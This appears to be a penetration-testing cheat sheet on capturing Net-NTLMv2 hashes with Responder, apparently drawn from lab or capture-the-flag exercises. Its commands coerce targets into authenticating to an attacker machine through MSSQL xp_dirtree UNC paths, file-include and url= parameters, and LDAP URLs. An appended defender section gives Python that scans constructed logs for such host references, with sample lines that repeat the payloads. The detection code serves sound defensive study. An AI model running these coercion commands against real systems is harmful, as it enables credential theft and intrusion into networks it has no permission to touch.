Init NTLMv2 Theft

NTLM and Net-NTLMv2

Start Responder listening on your network interface and wait.

sudo responder -I tun0 -dw -v

Net-NTLMv2 hashes may show up automatically.

Theft via SMB

See SMB Responder section.

Theft via Database

Kali> sudo responder -I tun0 -v

# Database with mssqlclient.py
SQL> EXEC sp_helprotect 'xp_dirtree'                    # check who may execute xp_dirtree
SQL> master.sys.xp_dirtree '\\10.10.14.54\any\thing'    # UNC path to the Kali IP

# Database with sqsh (batches are sent with "go")
1> use master;
2> EXEC sp_helprotect 'xp_dirtree';
3> go

1> exec master.dbo.xp_dirtree '\\10.10.14.54\any\thing'   # Kali IP
2> go

Theft via HTTP

# Find an RFI vulnerability and point it back at Kali
Kali> sudo responder -I tun0
Browser> http://school.flight.htb/index.php?view=//<Kali IP>/any/thing.txt

# Another example: a URL parameter that the server fetches itself
Kali> sudo responder -I tun0 -v
Kali> curl "http://192.168.206.165:8080/?url=http://192.168.49.206"   # url= points back at Kali

Theft via LDAP

Kali> sudo responder -I tun0

# Target: Windows OS
# Make the target connect to an LDAP URL on Kali so it authenticates back
# ldap://<Kali IP>:389
Target system or service> ldap://10.10.14.114:389
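Defender-side counterpart, added here and not part of these notes: the coercion primitives above (xp_dirtree given a UNC path, a file-include or url= parameter pointing at //host or ldap://host) all leave a remote host reference in server-side logs. This Python scans constructed MSSQL audit and web access log lines for such references and reports any host that is not on an allowlist of approved file servers; the allowlist, log formats and sample lines are assumptions.

```python
import re

# Hosts that servers may legitimately open UNC paths or URLs to (constructed
# allowlist for this example; populate it from your own inventory).
APPROVED_HOSTS = {"fs01.corp.local", "dc01.corp.local"}

# One pattern for the three shapes of remote host reference used by the
# coercion primitives above: a UNC path (\\host\share), a bare //host/path
# as accepted by PHP on Windows, or a scheme://host URL such as ldap://host.
HOST_REF_RE = re.compile(
    r"(?i)(?P<prefix>\\\\|[a-z][a-z0-9+.-]*://|//)(?P<host>[0-9a-z][0-9a-z.\-]*)"
)

# Constructed sample log lines: MSSQL audit records and web access log entries.
SAMPLE_LOGS = [
    r"2024-05-01T10:02:11Z mssql audit user=webapp stmt=exec master.dbo.xp_dirtree '\\10.10.14.54\any\thing'",
    '10.0.0.21 - - [01/May/2024:10:03:05 +0000] "GET /index.php?view=//10.10.14.54/any/thing.txt HTTP/1.1" 200 512',
    '10.0.0.21 - - [01/May/2024:10:04:40 +0000] "GET /?url=ldap://10.10.14.114:389 HTTP/1.1" 500 0',
    '10.0.0.21 - - [01/May/2024:10:05:12 +0000] "GET /?url=http://192.168.49.206 HTTP/1.1" 200 64',
    r"2024-05-01T10:06:00Z mssql audit user=svc_reports stmt=exec master.dbo.xp_dirtree '\\fs01.corp.local\reports'",
    '10.0.0.22 - - [01/May/2024:10:07:00 +0000] "GET /index.php?view=home HTTP/1.1" 200 2048',
]


def connection_kind(prefix: str) -> str:
    """Name the outbound connection a matched prefix would make the server open."""
    if prefix in ("\\\\", "//"):
        return "smb"            # UNC path: the server authenticates with NTLM over SMB
    return prefix[:-3].lower()  # scheme of a URL, e.g. "ldap" or "http"


def find_coercion_attempts(log_lines):
    """Return (line_number, kind, host) for every referenced host not on the allowlist."""
    findings = []
    for number, line in enumerate(log_lines, start=1):
        for match in HOST_REF_RE.finditer(line):
            host = match.group("host").lower()
            if host in APPROVED_HOSTS:
                continue
            findings.append((number, connection_kind(match.group("prefix")), host))
    return findings


if __name__ == "__main__":
    for number, kind, host in find_coercion_attempts(SAMPLE_LOGS):
        print(f"line {number}: possible NTLM coercion, {kind} connection to {host}")
```

Alerting on the host reference alone is cheap and independent of which protocol Responder ends up answering on; pair it with egress rules that block SMB and LDAP from servers to untrusted hosts.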
